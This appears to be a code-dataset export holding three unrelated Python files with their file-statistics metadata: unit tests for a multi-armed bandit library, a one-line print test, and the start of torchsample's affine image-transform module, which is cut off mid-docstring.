               [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
               [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
               [0, 2, 1, 0, 0]]

    def run(lp, cp=None):
        # Only pass neighborhood_policy when one is given, matching the two
        # call shapes used by the original per-policy loops.
        kwargs = dict(arms=["A", "B", "C", "D"],
                      decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
                      rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
                      learning_policy=lp,
                      context_history=history,
                      contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                      seed=123456,
                      num_run=1,
                      is_predict=True)
        if cp is not None:
            kwargs['neighborhood_policy'] = cp
        _, mab = self.predict(**kwargs)
        # Online update with two new contextual observations.
        mab.partial_fit(["A", "B"], [0, 0], [[1, 3, 1, 1, 1], [0, 0, 0, 0, 0]])

    for lp in MABTest.para_lps:
        run(lp)
    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
def test_partial_fit_without_fit(self):
    """partial_fit() on a fresh model must behave exactly like fit().

    For every policy combination the same data is fed once via
    partial_fit() on one fresh model and once via fit() on another fresh
    model; both must then make the same prediction.

    BUG FIXES vs. the original:
    - the nps x lps and cps x lps loops trained BOTH models with
      partial_fit(), making the equality assertion trivially true; the
      second model now uses fit(), matching the other loops.
    - the cps x lps loop was the only one missing the is_compatible()
      guard used everywhere else; it is added for consistency.
    """
    for lp in BaseTest.lps:
        mab = MAB([1, 2], lp)
        mab.partial_fit([1, 2], [0, 1])
        x1 = mab.predict()

        mab = MAB([1, 2], lp)
        mab.fit([1, 2], [0, 1])
        x2 = mab.predict()
        self.assertEqual(x1, x2)

    for para_lp in BaseTest.para_lps:
        mab = MAB([1, 2], para_lp)
        mab.partial_fit([1, 2], [0, 1], [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
        x1 = mab.predict([[0, 10, -2, 4, 2]])

        mab = MAB([1, 2], para_lp)
        mab.fit([1, 2], [0, 1], [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
        x2 = mab.predict([[0, 10, -2, 4, 2]])
        self.assertEqual(x1, x2)

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2], lp, cp)
            mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 1, 2, 3, 5],
                                                   [1, 1, 1, 1, 1],
                                                   [0, 0, 0, 0, 0]])
            x1 = mab.predict([[0, 10, -2, 4, 2]])

            mab = MAB([1, 2], lp, cp)
            # was partial_fit(): trivially-true comparison
            mab.fit([1, 2, 2], [0, 1, 0], [[0, 1, 2, 3, 5],
                                           [1, 1, 1, 1, 1],
                                           [0, 0, 0, 0, 0]])
            x2 = mab.predict([[0, 10, -2, 4, 2]])
            self.assertEqual(x1, x2)

    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2], para_lp, cp)
            mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 0, 0, 0, 0],
                                                   [0, 0, 0, 0, 0],
                                                   [0, 0, 0, 0, 0]])
            x1 = mab.predict([[0, 0, 0, 0, 0], ])

            mab = MAB([1, 2], para_lp, cp)
            mab.fit([1, 2, 2], [0, 1, 0], [[0, 0, 0, 0, 0],
                                           [0, 0, 0, 0, 0],
                                           [0, 0, 0, 0, 0]])
            x2 = mab.predict([[0, 0, 0, 0, 0]])
            self.assertEqual(x1, x2)

    for cp in BaseTest.cps:
        for lp in BaseTest.lps:
            # consistency fix: guard was missing only in this loop
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2], lp, cp)
            mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
                                                   [1, 1, 1, 1, 1],
                                                   [-3, 0, 0, -7, 0]])
            x1 = mab.predict([[0, 10, -2, 4, 2]])

            mab = MAB([1, 2], lp, cp)
            # was partial_fit(): trivially-true comparison
            mab.fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
                                           [1, 1, 1, 1, 1],
                                           [-3, 0, 0, -7, 0]])
            x2 = mab.predict([[0, 10, -2, 4, 2]])
            self.assertEqual(x1, x2)

    for cp in BaseTest.cps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2], para_lp, cp)
            mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
                                                   [1, 1, 1, 1, 1],
                                                   [-3, 0, 0, -7, 0]])
            x1 = mab.predict([[0, 0, 0, 0, 0]])

            mab = MAB([1, 2], para_lp, cp)
            mab.fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
                                           [1, 1, 1, 1, 1],
                                           [-3, 0, 0, -7, 0]])
            x2 = mab.predict([[0, 0, 0, 0, 0]])
            self.assertEqual(x1, x2)
def test_partial_fit_single_row(self):
    """Single-row predict + partial_fit round-trips on pandas row objects."""
    rng = np.random.RandomState(seed=9)

    def sample(n):
        # Draw n scalars one at a time so the random stream matches the
        # original per-column list comprehensions exactly.
        return [rng.rand() for _ in range(n)]

    train_data = pd.DataFrame({'a': sample(20),
                               'b': sample(20),
                               'c': sample(20),
                               'decision': [1, 2] * 10,
                               'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
    test_data = pd.DataFrame({'a': sample(3), 'b': sample(3),
                              'c': sample(3), 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
    context_columns = ['a', 'b', 'c']

    def replay(mab):
        # Feed the held-out rows one at a time: predict, then update.
        for _, row in test_data.iterrows():
            mab.predict(row[context_columns])
            mab.partial_fit([row['decision']], [row['reward']], row[context_columns])

    for para_lp in BaseTest.para_lps:
        mab = MAB([1, 2], para_lp)
        mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        replay(mab)

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2], lp, cp)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            replay(mab)

    # NOTE(review): the original comment here was truncated ("With
    # neighbors based approaches it is difficult to guarantee that") —
    # intent unclear; confirm against upstream history.
    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2], para_lp, cp)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            replay(mab)
def test_convert_matrix(self):
    """_convert_matrix accepts None, ndarrays (C and F order), lists, DataFrames, Series, and rows."""
    frame = pd.DataFrame({'one': [1, 2, 3], 'two': [2, 2, 2]})
    # Smoke-check every supported input form in the same order as before.
    for value in (None,
                  np.array([[1, 2, 3], [2, 2, 2]]),
                  [[1, 2, 3], [2, 2, 2]],
                  frame,
                  frame['one']):
        MAB._convert_matrix(value)
    MAB._convert_matrix(frame.loc[0], row=True)
    MAB._convert_matrix(np.array([[1, 2, 3], [2, 2, 2]], order='F'))
#################################################
# Test serialization
################################################
def test_pickle_before_fit(self):
    """An unfitted MAB survives a pickle round-trip and can be fit and used after.

    Uses `with` context managers for the pickle file (the original opened
    and closed handles manually, leaking them if dump/load raised).
    """
    rng = np.random.RandomState(seed=9)
    train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
                               'b': [rng.rand() for _ in range(20)],
                               'c': [rng.rand() for _ in range(20)],
                               'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
                               'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
    test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
                              'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
    context_columns = ['a', 'b', 'c']

    def roundtrip(mab):
        # Serialize to disk and load back; handles are closed even on error.
        with open('mab.pkl', 'wb') as f:
            pickle.dump(mab, f)
        with open('mab.pkl', 'rb') as f:
            return pickle.load(f)

    for lp in BaseTest.lps:
        new_mab = roundtrip(MAB([1, 2], lp))
        new_mab.fit(train_data['decision'], train_data['reward'])
        new_mab.predict()

    for para_lp in BaseTest.para_lps:
        new_mab = roundtrip(MAB([1, 2], para_lp))
        new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        new_mab.predict(test_data[context_columns])

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            new_mab = roundtrip(MAB([1, 2], lp, cp))
            new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            new_mab.predict(test_data[context_columns])

    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            new_mab = roundtrip(MAB([1, 2], para_lp, cp))
            new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            new_mab.predict(test_data[context_columns])

    os.remove('mab.pkl')
def test_pickle_fitted(self):
    """A fitted MAB survives a pickle round-trip and can predict after reload.

    Uses `with` context managers for the pickle file (the original opened
    and closed handles manually, leaking them if dump/load raised).
    """
    rng = np.random.RandomState(seed=9)
    train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
                               'b': [rng.rand() for _ in range(20)],
                               'c': [rng.rand() for _ in range(20)],
                               'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
                               'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
    test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
                              'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
    context_columns = ['a', 'b', 'c']

    def roundtrip(mab):
        # Serialize to disk and load back; handles are closed even on error.
        with open('mab.pkl', 'wb') as f:
            pickle.dump(mab, f)
        with open('mab.pkl', 'rb') as f:
            return pickle.load(f)

    for lp in BaseTest.lps:
        mab = MAB([1, 2], lp)
        mab.fit(train_data['decision'], train_data['reward'])
        roundtrip(mab).predict()

    for para_lp in BaseTest.para_lps:
        mab = MAB([1, 2], para_lp)
        mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        roundtrip(mab).predict(test_data[context_columns])

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2], lp, cp)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            roundtrip(mab).predict(test_data[context_columns])

    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2], para_lp, cp)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            roundtrip(mab).predict(test_data[context_columns])

    os.remove('mab.pkl')
def test_pickle_fitted_reproducibility(self):
    """A reloaded fitted MAB predicts exactly like an identically-trained twin.

    Two models with the same seed are fit on the same data; one is
    round-tripped through pickle, and both must predict the same arms.
    Uses `with` context managers for the pickle file (the original opened
    and closed handles manually, leaking them if dump/load raised).
    """
    rng = np.random.RandomState(seed=9)
    train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
                               'b': [rng.rand() for _ in range(20)],
                               'c': [rng.rand() for _ in range(20)],
                               'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
                               'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
    test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
                              'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
    context_columns = ['a', 'b', 'c']

    def roundtrip(mab):
        # Serialize to disk and load back; handles are closed even on error.
        with open('mab.pkl', 'wb') as f:
            pickle.dump(mab, f)
        with open('mab.pkl', 'rb') as f:
            return pickle.load(f)

    for lp in BaseTest.lps:
        mab = MAB([1, 2, 3], lp, seed=11)
        mab.fit(train_data['decision'], train_data['reward'])
        p1 = mab.predict()
        mab2 = MAB([1, 2, 3], lp, seed=11)
        mab2.fit(train_data['decision'], train_data['reward'])
        p2 = roundtrip(mab2).predict()
        self.assertEqual(p1, p2)

    for para_lp in BaseTest.para_lps:
        mab = MAB([1, 2, 3], para_lp, seed=11)
        mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        p1 = mab.predict(test_data[context_columns])
        mab2 = MAB([1, 2, 3], para_lp, seed=11)
        mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        p2 = roundtrip(mab2).predict(test_data[context_columns])
        self.assertEqual(p1, p2)

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2, 3], lp, cp, seed=11)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            p1 = mab.predict(test_data[context_columns])
            mab2 = MAB([1, 2, 3], lp, cp, seed=11)
            mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            p2 = roundtrip(mab2).predict(test_data[context_columns])
            self.assertEqual(p1, p2)

    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2, 3], para_lp, cp, seed=11)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            p1 = mab.predict(test_data[context_columns])
            mab2 = MAB([1, 2, 3], para_lp, cp, seed=11)
            mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            p2 = roundtrip(mab2).predict(test_data[context_columns])
            self.assertEqual(p1, p2)

    os.remove('mab.pkl')
def test_pickle_fitted_reproducibile_expectations(self):
    """predict_expectations() survives a pickle round-trip unchanged.

    NOTE: 'reproducibile' is a typo in the original name; it is kept so
    test discovery and external references stay stable.

    Changes vs. the original: the unused `rng = np.random.RandomState(9)`
    local was removed (all fixture data here is literal), and the pickle
    file is handled with `with` context managers so handles are closed
    even if dump/load raises.
    """
    train_data = pd.DataFrame({'a': [0.1, 0, 0.1, 0, 0, 0.1, 0, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
                               'b': [0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
                               'c': [0, 0.1, 0.1, 0, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
                               'd': [0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0, 0.1, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
                               'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
                               'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
    test_data = pd.DataFrame({'a': [0, 0.1, 0],
                              'b': [0.1, 0, 0],
                              'c': [0, 0, 0],
                              'd': [0, 0, 0.1],
                              'decision': [1, 1, 2],
                              'reward': [0, 1, 1]})
    context_columns = ['a', 'b', 'c', 'd']

    def roundtrip(mab):
        # Serialize to disk and load back; handles are closed even on error.
        with open('mab.pkl', 'wb') as f:
            pickle.dump(mab, f)
        with open('mab.pkl', 'rb') as f:
            return pickle.load(f)

    for lp in BaseTest.lps:
        mab = MAB([1, 2, 3], lp, seed=11)
        mab.fit(train_data['decision'], train_data['reward'])
        pe1 = mab.predict_expectations()
        mab2 = MAB([1, 2, 3], lp, seed=11)
        mab2.fit(train_data['decision'], train_data['reward'])
        pe2 = roundtrip(mab2).predict_expectations()
        # Context-free expectations come back as a single arm->value dict.
        self.assertDictEqual(pe1, pe2)

    for para_lp in BaseTest.para_lps:
        mab = MAB([1, 2, 3], para_lp, seed=11)
        mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        pe1 = mab.predict_expectations(test_data[context_columns])
        mab2 = MAB([1, 2, 3], para_lp, seed=11)
        mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
        pe2 = roundtrip(mab2).predict_expectations(test_data[context_columns])
        self.assertListEqual(pe1, pe2)

    for cp in BaseTest.nps:
        for lp in BaseTest.lps:
            if not self.is_compatible(lp, cp):
                continue
            mab = MAB([1, 2, 3], lp, cp, seed=11)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            pe1 = mab.predict_expectations(test_data[context_columns])
            mab2 = MAB([1, 2, 3], lp, cp, seed=11)
            mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            pe2 = roundtrip(mab2).predict_expectations(test_data[context_columns])
            self.assertListEqual(pe1, pe2)

    for cp in BaseTest.nps:
        for para_lp in BaseTest.para_lps:
            if not self.is_compatible(para_lp, cp):
                continue
            mab = MAB([1, 2, 3], para_lp, cp, seed=11)
            mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            pe1 = mab.predict_expectations(test_data[context_columns])
            mab2 = MAB([1, 2, 3], para_lp, cp, seed=11)
            mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
            pe2 = roundtrip(mab2).predict_expectations(test_data[context_columns])
            self.assertListEqual(pe1, pe2)

    os.remove('mab.pkl')
| 45.417885
| 117
| 0.371392
| 10,090
| 80,753
| 2.875818
| 0.021011
| 0.053555
| 0.050867
| 0.043009
| 0.934866
| 0.929972
| 0.92432
| 0.919185
| 0.907675
| 0.897026
| 0
| 0.122786
| 0.475561
| 80,753
| 1,777
| 118
| 45.443444
| 0.562385
| 0.005783
| 0
| 0.900069
| 0
| 0
| 0.014781
| 0
| 0
| 0
| 0
| 0
| 0.068008
| 1
| 0.03331
| false
| 0
| 0.005552
| 0.000694
| 0.04025
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a04b3121ad6618272e44afe7f0cd50f0a762f16
| 80
|
py
|
Python
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 3
|
2021-03-23T05:22:29.000Z
|
2022-01-26T02:07:27.000Z
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 1
|
2021-04-06T08:06:39.000Z
|
2021-04-06T08:10:38.000Z
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 1
|
2021-08-11T17:20:54.000Z
|
2021-08-11T17:20:54.000Z
|
# GET /test/result/test_multi_code_folders
print("multi code folders is ok!")
| 16
| 42
| 0.7625
| 13
| 80
| 4.461538
| 0.692308
| 0.310345
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 80
| 4
| 43
| 20
| 0.828571
| 0.5
| 0
| 0
| 0
| 0
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
8a1f9c21341ccb8599175ded2bff5c5ce4d6ca4c
| 27,029
|
py
|
Python
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 1,934
|
2017-03-02T02:25:41.000Z
|
2022-03-29T16:15:19.000Z
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 96
|
2017-03-05T19:09:06.000Z
|
2022-02-04T21:37:46.000Z
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 337
|
2017-03-02T05:55:43.000Z
|
2022-03-15T02:01:45.000Z
|
"""
Affine transforms implemented on torch tensors, and
requiring only one interpolation
"""
import math
import random
import torch as th
from ..utils import th_affine2d, th_random_choice
class RandomAffine(object):

    def __init__(self,
                 rotation_range=None,
                 translation_range=None,
                 shear_range=None,
                 zoom_range=None,
                 interp='bilinear',
                 lazy=False):
        """
        Perform an affine transform with various random sub-transforms,
        using only one interpolation and without having to instantiate
        each sub-transform individually.

        Arguments
        ---------
        rotation_range : one integer or float
            image will be rotated randomly between (-degrees, degrees)

        translation_range : a float or a tuple/list with 2 floats between [0, 1)
            first value:
                image will be horizontally shifted between
                (-height_range * height_dimension, height_range * height_dimension)
            second value:
                image will be vertically shifted between
                (-width_range * width_dimension, width_range * width_dimension)

        shear_range : float
            image will be sheared randomly between (-degrees, degrees)

        zoom_range : list/tuple with two floats between [0, infinity).
            first float should be less than the second
            lower and upper bounds on percent zoom.
            Anything less than 1.0 will zoom in on the image,
            anything greater than 1.0 will zoom out on the image.
            e.g. (0.7, 1.0) will only zoom in,
            (1.0, 1.4) will only zoom out,
            (0.7, 1.4) will randomly zoom in or out

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only return the composed affine transform matrix

        Raises
        ------
        ValueError
            if no sub-transform range is given at all
        """
        # Each enabled sub-transform is created lazy so that calling it
        # yields its affine matrix instead of a transformed tensor.
        self.transforms = []
        if rotation_range is not None:
            self.transforms.append(RandomRotate(rotation_range, lazy=True))
        if translation_range is not None:
            self.transforms.append(RandomTranslate(translation_range, lazy=True))
        if shear_range is not None:
            self.transforms.append(RandomShear(shear_range, lazy=True))
        if zoom_range is not None:
            self.transforms.append(RandomZoom(zoom_range, lazy=True))

        self.interp = interp
        self.lazy = lazy

        if len(self.transforms) == 0:
            # ValueError (was a bare Exception) is the conventional type for
            # invalid constructor arguments; callers catching Exception are
            # unaffected.
            raise ValueError('Must give at least one transform parameter')

    def __call__(self, *inputs):
        # Compose the lazily-returned affine matrices of all sub-transforms
        # (each is evaluated against the first input) by matrix multiplication.
        tform_matrix = self.transforms[0](inputs[0])
        for tform in self.transforms[1:]:
            tform_matrix = tform_matrix.mm(tform(inputs[0]))

        self.tform_matrix = tform_matrix

        if self.lazy:
            return tform_matrix
        else:
            # Apply the composed matrix once, with a single interpolation.
            outputs = Affine(tform_matrix,
                             interp=self.interp)(*inputs)
            return outputs
class Affine(object):

    def __init__(self,
                 tform_matrix,
                 interp='bilinear'):
        """
        Apply a given affine transform matrix to each input, using only
        one interpolation and without having to instantiate each
        sub-transform individually.

        Arguments
        ---------
        tform_matrix : a 2x3 or 3x3 matrix
            affine transformation matrix to apply

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`
        """
        self.tform_matrix = tform_matrix
        self.interp = interp

    def __call__(self, *inputs):
        # Broadcast a single interpolation mode across all inputs.
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        outputs = []
        for idx, _input in enumerate(inputs):
            input_tf = th_affine2d(_input,
                                   self.tform_matrix,
                                   mode=interp[idx])
            outputs.append(input_tf)
        # BUG FIX: was `idx > 1`, which silently dropped the second output
        # whenever exactly two inputs (e.g. image + mask) were given.
        return outputs if len(outputs) > 1 else outputs[0]
class AffineCompose(object):

    def __init__(self,
                 transforms,
                 interp='bilinear'):
        """
        Apply a collection of explicit affine transforms to an input image,
        and to a target image if necessary

        Arguments
        ---------
        transforms : list or tuple
            each element in the list/tuple should be an affine transform.
            currently supported transforms:
                - Rotate()
                - Translate()
                - Shear()
                - Zoom()

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`
        """
        self.transforms = transforms
        self.interp = interp

        # set transforms to lazy so they only return the tform matrix
        for t in self.transforms:
            t.lazy = True

    def __call__(self, *inputs):
        # collect all of the lazily returned tform matrices and compose
        # them into a single affine matrix
        tform_matrix = self.transforms[0](inputs[0])
        for tform in self.transforms[1:]:
            tform_matrix = tform_matrix.mm(tform(inputs[0]))

        # Broadcast a single interpolation mode across all inputs.
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        outputs = []
        for idx, _input in enumerate(inputs):
            input_tf = th_affine2d(_input,
                                   tform_matrix,
                                   mode=interp[idx])
            outputs.append(input_tf)
        # BUG FIX: was `idx > 1`, which silently dropped the second output
        # whenever exactly two inputs (e.g. image + mask) were given.
        return outputs if len(outputs) > 1 else outputs[0]
class RandomRotate(object):

    def __init__(self,
                 rotation_range,
                 interp='bilinear',
                 lazy=False):
        """
        Rotate an image by an angle drawn uniformly at random from
        (-rotation_range, rotation_range). If the image has multiple
        channels, the same rotation is applied to each channel.

        Arguments
        ---------
        rotation_range : integer or float
            image will be rotated between (-degrees, degrees) degrees

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that;
            if false, perform the transform on the tensor(s) and return them
        """
        self.rotation_range = rotation_range
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # draw the rotation angle for this call
        angle = random.uniform(-self.rotation_range, self.rotation_range)
        if self.lazy:
            # only the transform matrix is needed; derive it from the first input
            return Rotate(angle, lazy=True)(inputs[0])
        return Rotate(angle, interp=self.interp)(*inputs)
class RandomChoiceRotate(object):

    def __init__(self,
                 values,
                 p=None,
                 interp='bilinear',
                 lazy=False):
        """
        Rotate an image by an angle sampled from a user-given list of
        candidate values. If the image has multiple channels, the same
        rotation is applied to each channel.

        Arguments
        ---------
        values : a list or tuple
            the values from which the rotation value will be sampled

        p : a list or tuple the same length as `values`
            the probabilities of sampling any given value. Must sum to 1.

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that;
            if false, perform the transform on the tensor(s) and return them
        """
        if isinstance(values, (list, tuple)):
            values = th.FloatTensor(values)
        self.values = values
        if p is None:
            # default to a uniform distribution over the candidates
            p = th.ones(len(values)) / len(values)
        elif abs(1.0 - sum(p)) > 1e-3:
            raise ValueError('Probs must sum to 1')
        self.p = p
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        chosen_degree = th_random_choice(self.values, p=self.p)
        if self.lazy:
            return Rotate(chosen_degree, lazy=True)(inputs[0])
        return Rotate(chosen_degree, interp=self.interp)(*inputs)
class Rotate(object):

    def __init__(self,
                 value,
                 interp='bilinear',
                 lazy=False):
        """
        Rotate an image by a fixed angle. If the image has multiple channels,
        the same rotation will be applied to each channel.

        Arguments
        ---------
        value : integer or float
            the rotation angle in degrees
            (docstring previously described a `rotation_range` parameter
            that does not exist on this class)

        interp : string in {'bilinear', 'nearest'} or list of strings
            type of interpolation to use. You can provide a different
            type of interpolation for each input, e.g. if you have two
            inputs then you can say `interp=['bilinear','nearest']`

        lazy : boolean
            if true, only create the affine transform matrix and return that
            if false, perform the transform on the tensor and return the tensor
        """
        self.value = value
        self.interp = interp
        self.lazy = lazy

    def __call__(self, *inputs):
        # broadcast a single interpolation mode to every input
        if not isinstance(self.interp, (tuple, list)):
            interp = [self.interp] * len(inputs)
        else:
            interp = self.interp

        # degrees -> radians, then build the 3x3 homogeneous rotation matrix
        theta = math.pi / 180 * self.value
        rotation_matrix = th.FloatTensor([[math.cos(theta), -math.sin(theta), 0],
                                          [math.sin(theta), math.cos(theta), 0],
                                          [0, 0, 1]])
        if self.lazy:
            return rotation_matrix
        else:
            outputs = []
            for idx, _input in enumerate(inputs):
                input_tf = th_affine2d(_input,
                                       rotation_matrix,
                                       mode=interp[idx],
                                       center=True)
                outputs.append(input_tf)
            # BUGFIX: was `idx > 1`, which silently dropped the second output
            # when exactly two inputs were given
            return outputs if len(outputs) > 1 else outputs[0]
class RandomTranslate(object):

    def __init__(self,
                 translation_range,
                 interp='bilinear',
                 lazy=False):
        """
        Translate an image by a random fraction of its total height and/or
        width. If the image has multiple channels, the same translation is
        applied to each channel.

        Arguments
        ---------
        translation_range : two floats between [0, 1)
            first value:
                fractional bounds of total height to shift image;
                image will be shifted between
                (-height_range * height_dimension, height_range * height_dimension)
            second value:
